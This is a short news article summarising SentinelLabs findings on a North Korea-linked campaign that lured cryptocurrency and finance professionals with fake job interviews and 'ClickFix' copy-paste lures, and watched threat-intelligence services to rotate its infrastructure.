This post is also available in:
עברית (Hebrew)
A new wave of cyberattacks linked to North Korea has targeted hundreds of individuals globally, with a focus on professionals working in cryptocurrency-related fields. The campaign, which took place between March and June 2025, used fake job offers to trick victims into installing malware on their devices.
Cybersecurity researchers from SentinelLabs revealed that the attackers are part of a growing group of state-backed hacking operations using social engineering to bypass technical defenses. Their aim is financial: to steal crypto assets and generate revenue for North Korea’s sanctioned programs, including missile development.
The attackers pose as recruiters or job applicants, luring victims—primarily in blockchain, marketing, and finance sectors—into fake interview processes. Targets are invited to complete assessments in which they solve CAPTCHAs that appear legitimate but are actually used to deliver malicious code. A common method involves prompting users to copy and paste malware-laden scripts under the pretense of fixing errors, a tactic known as “ClickFix.”
Behind the scenes, the campaign abuses popular cyber intelligence tools to monitor for signs their infrastructure is being discovered. Logs exposed from misconfigured North Korean servers showed they used platforms like VirusTotal, Maltrail, and commercial threat intelligence services such as Validin to track if their malware or domains had been flagged.
In one example, the attackers monitored hiring-related domains that were available for purchase, acquiring them to create realistic fake websites. Once active, they watched for detection signals and quickly moved to new infrastructure if any threats emerged. According to researchers, this pattern suggests that rather than investing in more robust long-term infrastructure, teams simply rotate assets as needed.
The attacks appear to be carried out in coordinated groups, with Slack used for real-time collaboration and the sharing of URLs. SentinelLabs notes that poor operational security by the attackers led to the unintentional exposure of logs, directories, and internal files, giving researchers a rare window into how these campaigns operate.
Security teams have since worked to shut down fake recruitment sites, email accounts, IP addresses, and malware servers linked to the operation. However, the broader infrastructure remains active, and more incidents are expected.
